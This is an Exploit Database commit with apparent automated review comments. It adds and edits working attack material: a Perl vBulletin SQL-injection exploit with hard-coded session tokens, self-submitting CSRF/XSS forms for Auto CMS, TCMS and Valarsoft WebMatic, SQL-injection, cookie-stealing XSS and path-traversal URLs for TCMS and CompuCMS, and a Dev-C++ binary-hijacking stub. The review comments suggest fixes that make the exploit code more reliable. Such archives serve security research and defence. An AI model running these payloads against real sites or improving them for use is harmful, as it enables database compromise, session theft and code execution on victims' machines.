Updated 09_06_2014

This commit is contained in:
Offensive Security 2014-09-06 04:42:44 +00:00
parent c587ffef9c
commit bdd1b1c20a
8 changed files with 217 additions and 17 deletions


@ -31013,7 +31013,7 @@ id,file,description,date,author,platform,type,port
34431,platforms/linux/remote/34431.html,"Nagios XI Multiple Cross Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0
34432,platforms/php/webapps/34432.txt,"Wowd 'index.html' Multiple Cross Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0
34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 'SDL2.php' Cross Site Scripting Vulnerability",2010-10-22,"Amol Naik",php,webapps,0
34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0
34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 0.2.3 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0
34437,platforms/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision Vulnerability",2010-08-11,"Florian Zumbiehl",windows,remote,0
34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 'Topic' Field HTML Injection Vulnerability",2010-08-11,3ethicalhackers.com,php,webapps,0
34439,platforms/multiple/remote/34439.txt,"ServletExec Directory Traversal Vulnerability and Multiple Authentication-Bypass Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0
@ -31099,3 +31099,8 @@ id,file,description,date,author,platform,type,port
34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader <= 9.3.4 'AcroForm.api' Memory Corruption Vulnerability",2010-08-25,ITSecTeam,multiple,dos,0
34530,platforms/windows/dos/34530.py,"Crystal Player v1.98 '.mls' File Buffer Overflow Vulnerability",2010-08-20,"Praveen Darshanam",windows,dos,0
34531,platforms/php/webapps/34531.txt,"BlastChat Client 3.3 Cross Site Scripting Vulnerability",2010-08-25,"Aung Khant",php,webapps,0
34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 Multiple EXE Loading Arbitrary Code Execution Vulnerability",2010-08-25,storm,windows,remote,0
34533,platforms/php/webapps/34533.txt,"Auto CMS 1.6 'autocms.php' Cross-Site Scripting Vulnerability",2010-08-23,"High-Tech Bridge SA",php,webapps,0
34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0



@ -4,7 +4,7 @@
# Severity : High+/Critical
# Reporter(s) : Mehdi Karout & Christian Galeone
# Google Dork : inurl:wp/wp-content/force-download.php
# Plugin Version : 1.1
# Plugin Version : 0.2.3
# Plugin Name : Download ShortCode
# Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip
# Vendor Home : http://werdswords.com/
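Review bot: The version line is corrected to `0.2.3` (the files.csv entry in this commit carries the same value, so that appears to be the new side), but the download link two lines below still reads `http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip`, so the header now names one release as affected and links another. If 0.2.3 is the release that was tested, the `# Plugin Download Link :` line should point at the matching archive; if 1.1 is what was actually tested, the version line is the one that should change back. Either way the two lines should agree before the header is relied on for reproduction.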


@ -6,8 +6,7 @@
# Tested on: vBulletin 4.1.2
# Usage: perl exploit.pl <http://target> <valid username> <valid passwd> <existent group> <userid to hack>
# Tutorial video: https://www.youtube.com/watch?v=_jec3nkoYFc
# IMPORTANT: At the first execution of the exploit I suggest you to login and logout to the forum (with a browser), then running it in order to allow the exploit to retrieve the correct security token to use. If you run more than one time the exploit, it may not get the security token because of the previous session's cookies and so you may have some problems retrieving the correct information. THE SOLUTION IS to copy the correct security token previously found (usually at the first run) and paste it into the source code where I wrote 'HERE'.
# Vulnerability discovered by: D4rkB1t (http://www.exploit-db.com/exploits/17314/)
# Vulnerability discovered by: D4rkB1t
#!/usr/bin/env perl
use LWP::UserAgent;
@ -24,13 +23,14 @@ $salt = "salt) from user where userid=$ARGV[4]#";
sub request
{
$req = HTTP::Request->new(GET => $ARGV[0]);
my $res1 = $ua->request($req);
open(FILE01, "> vbloginout.txt"); print FILE01 $res1->content; close(FILE01);
my $token = dumping("vbloginout.txt","token");
if($token eq '')
if($token eq '' || $token eq 'guest')
{
print "SECURITYTOKEN not found (Make sure to log out from any other previous logged sessions before running the exploit).\n";
#print "Attempting using 1409594055-f2133dfe1f26a36f6349eb3a946ac38c94a182e6 as token.\n";
$token = "1409750140-51ac26286027a4bc2b2ac38a7483081c2a4b2a3e"; # HERE
print "SECURITYTOKEN not found!\n";
$token = "1409782759-e58c864fcc4e1ec7e23d31439af4b8cc181b789f"; # HERE
print "Attempting using $token as token.\n";
}
else
@ -48,7 +48,6 @@ sub request
$post = "query=$ARGV[3]&titleonly=0&dosearch=Search+Now&memberless=0&memberlimit=&discussionless=0&discussionlimit=&messageless=0&messagelimit=&pictureless=0&picturelimit=&sortby=dateline&order=descending&group_filter_date_lteq_month=0&group_filter_date_lteq_day=1&group_filter_date_lteq_year=&group_filter_date_gteq_month=0&group_filter_date_gteq_day=1&group_filter_date_gteq_year=&saveprefs=1&s=&securitytoken=$token&dofilter=1&do=process&searchfromtype=vBForum%3ASocialGroup&contenttypeid=7&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
$req->content($post);
my $res = $ua->request($req);
#print $res->headers()->as_string; print "\n\n";
open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0);
my $location = dumping("vbloc.txt","loc");
@ -57,11 +56,10 @@ sub request
banner();
break;
}
#print "Location: $location\n";
my $req1 = HTTP::Request->new(GET => $location);
$req1->content_type('application/x-www-form-urlencoded');
my $res1 = $ua->request($req1);
#print $res1->content; print "\n";
open(FILE,"> vbout.txt");
print FILE $res1->content;
close(FILE);
@ -91,7 +89,6 @@ sub second_request
$post = "type%5B%5D=7&query=$ARGV[3]&titleonly=0&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=$token&do=process&searchthreadid=&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
$req->content($post);
my $res = $ua->request($req);
#print $res->headers()->as_string; print "\n\n";
open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0);
my $location = dumping("vbloc.txt","loc");
@ -100,11 +97,10 @@ sub second_request
banner();
exit(1);
}
#print "Location: $location\n";
my $req1 = HTTP::Request->new(GET => $location);
$req1->content_type('application/x-www-form-urlencoded');
my $res1 = $ua->request($req1);
#print $res1->content; print "\n";
open(FILE,"> vbout.txt");
print FILE $res1->content;
close(FILE);
@ -219,8 +215,6 @@ sub login(@)
$req->content("vb_login_username=$username&vb_login_password=$password&s=&securitytoken=1409514185-74f04ec0932a6f070268bf287797b5dc0db05530&do=login&vb_login_md5password=&vb_login_md5password_utf=");
$ua->cookie_jar({});
my $res = $ua->request($req);
#print "\n"; print $res->content; print "\n";
open(FILE2,"> vbloginout.txt"); print FILE2 $res->content; close(FILE2);
request();
}
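Review bot: `break;` on the `banner();` error path in `request` is not Perl control flow — without the `switch` feature it is a bare word that does nothing (under `use strict` it would not compile), so the sub appears to carry on and build `HTTP::Request->new(GET => $location)` from whatever `$location` holds; the same path in `second_request` uses `exit(1);`, and `request` should do the same or `return;`. The bodies of `request`, `second_request` and `login` all begin outside their hunks. The file handles written in these hunks (`open(FILE01, "> vbloginout.txt")`, `FILE0`, `FILE`, `FILE2`) are bareword, two-argument and unchecked, so a failed open silently leaves an empty or stale file for the following `dumping()` call; the three-argument lexical form `open(my $out, '>', 'vbloginout.txt') or die "open vbloginout.txt: $!";` surfaces the error. The new `$token eq 'guest'` branch then continues with the hard-coded value marked `# HERE`, which is a session-bound token that goes stale; that branch is better treated as a hard failure (`die`) than as something to proceed from.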

30
platforms/php/webapps/34533.txt Executable file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/42764/info
Auto CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Auto CMS 1.6 is vulnerable; other versions may be affected.
<form action="http://www.example.com/index.php" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="site_name" value="AutoCMS by Roberto Aleman" />
<input type="hidden" name="site_url" value="index.php" />
<input type="hidden" name="sitetitle" value=&#039;AutoCMS by Roberto Aleman"><script>alert("XSS")</script>&#039; />
<input type="hidden" name="admin_email" value="admin@example.com" />
<input type="hidden" name="admin_password" value="" />
<input type="hidden" name="css_file" value="black.css" />
<input type="hidden" name="index_name_link" value="Index" />
<input type="hidden" name="about_name_link" value="About" />
<input type="hidden" name="about_content" value="put about text here" />
<input type="hidden" name="ps_name_link" value="" />
<input type="hidden" name="ps_content" value="put producs and services text here" />
<input type="hidden" name="news_name_link" value="News" />
<input type="hidden" name="news_content" value="Title Example1: Text Example1/Title Example2: Text Example2/" />
<input type="hidden" name="contact_name_link" value="Contact" />
<input type="hidden" name="update" value="update" />
</form>
<script>
document.main.submit();
</script>

53
platforms/php/webapps/34534.txt Executable file

@ -0,0 +1,53 @@
source: http://www.securityfocus.com/bid/42766/info
TCMS is prone to multiple input-validation vulnerabilities, including a local file-include vulnerability, a local file-disclosure vulnerability, multiple SQL-injection vulnerabilities, and multiple cross-site scripting vulnerabilities.
An attacker can exploit these vulnerabilities to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain potentially sensitive information, or execute arbitrary local scripts in the context of the webserver process; other attacks are also possible.
http://www.example.com/www/index.php?admin=1&section=content&action=edit&id=PAGE_ID'+ANY_SQL
http://www.example.com/www/index.php?template=home&content=home'+ANY_SQL
http://www.example.com/www/index.php?template=forum&action=showReplies&index=1'+ANY_SQL_CODE
http://www.example.com/www/index.php?template=blog&id=1'+ANY_SQL_CODE
<form action="http://www.example.com/www/index.php" method="post" name="main" >
<input type="hidden" name="template" value="3" />
<input type="hidden" name="language" value="1" />
<input type="hidden" name="name" value="home" />
<input type="hidden" name="note" value='The note text' />
<input type="hidden" name="value" value="page content" />
<input type="hidden" name="admin" value="1" />
<input type="hidden" name="text" value="1" />
<input type="hidden" name="section" value="content" />
<input type="hidden" name="id" value="9'+ANY_SQL_CODE" />
<input type="hidden" name="action" value="Save text" />
</form>
<script>
document.main.submit();
</script>
<form action="http://www.example.com/www/index.php" method="post" name="main" >
<input type="hidden" name="template" value="3" />
<input type="hidden" name="language" value="1" />
<input type="hidden" name="name" value="home" />
<input type="hidden" name="note" value='The note text"><script>alert(document.cookie)</script>' />
<input type="hidden" name="value" value="page content" />
<input type="hidden" name="admin" value="1" />
<input type="hidden" name="text" value="1" />
<input type="hidden" name="section" value="content" />
<input type="hidden" name="id" value="9" />
<input type="hidden" name="action" value="Save text" />
http://www.example.com/www/index.php?admin=1&section=language"><script>alert(document.cookie)</script>&action=addLanguage
</form>
<script>
document.main.submit();
</script>
http://www.example.com/www/index.php?template=./../../../../../../../tmp/test.php%00
http://www.example.com/www/index.php?admin=1&section=style&action=editStylesheet&name=./../../../../../../../tmp/test.php
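Review bot: The bare URL `http://www.example.com/www/index.php?admin=1&section=language...&action=addLanguage` sits inside the second `<form>` element, between the last `<input>` and `</form>`, so it reads as part of the form markup rather than as the separate GET example it appears to be; moving it after the closing `</script>` next to the other URL examples keeps each proof-of-concept self-contained. Both forms also carry `name="main"` and are each followed by `document.main.submit();`, which resolves to the first form only if the file is loaded as one document — a one-line note per block saying they are intended to be used separately would avoid that confusion.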

61
platforms/php/webapps/34535.txt Executable file

@ -0,0 +1,61 @@
source: http://www.securityfocus.com/bid/42767/info
Valarsoft WebMatic is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Valarsoft WebMatic 3.0.5 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/index.php" method="post" name="main" >
<input type="hidden" name="browser_bar_title" value="Webmatic" />
<input type="hidden" name="title" value="Welcome to Webmatic" />
<input type="hidden" name="special_user_label" value="Special user" />
<input type="hidden" name="staff_name" value="Webmatic editorial staff" />
<input type="hidden" name="home" value=&#039;Webmatic its2"><script>alert(document.cookie)</script>&#039; />
<input type="hidden" name="foot" value="" />
<input type="hidden" name="signalation_email_subject" value="Subject" />
<input type="hidden" name="signalation_email_text" value="text" />
<input type="hidden" name="user_registration_email_subject" value="Subject" />
<input type="hidden" name="user_registration_email_text" value="text" />
<input type="hidden" name="send" value="Save" />
<input type="hidden" name="languageID" value="1" />
<input type="hidden" name="stage" value="2" />
<input type="hidden" name="section" value="21" />
<input type="hidden" name="action" value="578" />
</form>
<script>
document.main.submit();
</script>
<form action="http://www.example.com/index.php" method="post" name="main" >
<input type="hidden" name="title" value="pagetest" />
<input type="hidden" name="subtitle" value=&#039;some subtitle and"><script>alert(document.cookie)</script>&#039; />
<input type="hidden" name="enabled" value="1" />
<input type="hidden" name="categoryID" value="1" />
<input type="hidden" name="page_type" value="1" />
<input type="hidden" name="visibility" value="1" />
<input type="hidden" name="groupID" value="1" />
<input type="hidden" name="backID" value="0" />
<input type="hidden" name="left_panels_enabled" value="1" />
<input type="hidden" name="right_panels_enabled" value="1" />
<input type="hidden" name="render_mode" value="2" />
<input type="hidden" name="head" value="" />
<input type="hidden" name="body" value="" />
<input type="hidden" name="hr_width" value="100" />
<input type="hidden" name="hr_size" value="1" />
<input type="hidden" name="hr_align" value="0" />
<input type="hidden" name="img_picture" value="1.gif" />
<input type="hidden" name="img_border" value="0" />
<input type="hidden" name="a_link" value="1" />
<input type="hidden" name="a_url" value="" />
<input type="hidden" name="a_text" value="" />
<input type="hidden" name="foot" value="" />
<input type="hidden" name="send" value="Save" />
<input type="hidden" name="stage" value="2" />
<input type="hidden" name="section" value="14" />
<input type="hidden" name="action" value="216" />
<input type="hidden" name="pageID" value="2" />
</form>
<script>
document.main.submit();
</script>

23
platforms/php/webapps/34536.txt Executable file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/42773/info
CompuCMS is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.asp?mode=visresultat&sogeord=%27+ANY_SQL_CODE
http://www.example.com/index.asp?mode=for!forside!gb&sprog=gb'"><script>alert(document.cookie)</script>
http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138&Dir=&site=demo%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ed&NoElementNum=0&NoFirstElement
http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138&Dir=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&site=demo&NoElementNum=0&NoFirstElement
http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&vispic=2138&Dir=&site=demo&NoElementNum=0&NoFirstElement
http://www.example.com/_CompuCMS/_CMS_output/_visbillede.asp?billede=1.jpg&tekst=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://www.example.com/_CompuCMS/_CMS_output/_visbillede.asp?billede=1.jpg%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&tekst=
http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138+ANY_SQL_CODE&Dir=www.compucms.dk/demo/&site=demo&NoElementNum=0&NoFirstElement
http://www.example.com/demo/index.asp?mode=nyh!forside~1220010667!dk&visid=383%27+ANY_SQL_CODE


@ -0,0 +1,34 @@
source: http://www.securityfocus.com/bid/42737/info
Bloodshed Dev-C++ is prone to a vulnerability that lets attackers execute arbitrary code. This issue affects 'make.exe' and 'minw32-make.exe'.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to compile a file from a network share location that contains a specially crafted executable file.
Bloodshed Dev-C++ 4.9.9.2 is vulnerable; other versions may also be affected.
/*
Exploit Title: Bloodshed Dev-C++ Binary Hijacking Exploit (make.exe, mingw32-make.exe)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Version: 4.9.9.2
Tested on: Windows Vista SP2
http://www.gonullyourself.org/
gcc -o make.exe Dev-C++-Binary.c
gcc -o mingw32-make.exe Dev-C++-Binary.c
...and place in appropriate directory. Executes your code four times.
Every file extension associated with Dev-C++ (.c, .cpp, .dev, .h, .hpp, .rc, .template) is affected. Dev-C++ Package Manager files (.devpackage, .devpak) are not affected, however.
*/
#include <windows.h>
int main()
{
WinExec("calc", 0);
exit(0);
return 0;
}
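Review bot: `exit(0);` in `main` is called without `#include <stdlib.h>`; `windows.h` is not guaranteed to declare `exit`, so the build relies on an implicit declaration, and the `return 0;` after it is unreachable — dropping `exit(0);` and keeping `return 0;` gives the same result with no extra header. The description line spells the second binary `minw32-make.exe` while the exploit header and build instructions say `mingw32-make.exe`; the two should agree so the affected file names can be matched reliably.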